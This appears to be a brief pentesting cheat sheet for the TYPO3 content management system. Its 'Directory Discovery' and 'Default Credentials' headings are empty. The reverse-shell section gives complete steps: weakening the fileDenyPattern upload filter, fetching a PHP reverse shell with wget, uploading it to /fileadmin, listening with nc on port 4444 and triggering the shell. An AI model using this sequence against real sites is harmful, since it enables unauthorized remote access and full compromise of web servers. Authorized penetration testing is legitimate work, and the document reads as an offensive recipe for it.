TYPO3 Pentesting

Last modified: 2022-12-01


TYPO3 is a web content management system. It can run on web servers like Apache, Nginx or IIS.

Directory Discovery


Default Credentials


Reverse Shell (Admin Credential Required)

First, to check and edit the configuration of the uploaded file extension, go to “ADMIN TOOLS” → “Configure Installation-Wide Options” → “Backend” → “fileDenyPattern”.
Update the configuration if necessary. For example, remove “php[1-9]?”


Next, prepare the payload for reverse shell named “shell.php”.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

Go to “FILE” → “Filelist” and upload the payload to the root of /fileadmin.
Now you need to open listener for getting the shell.

nc -lvnp 4444

Then access to “/fileadmin/shell.php”. You should get the shell.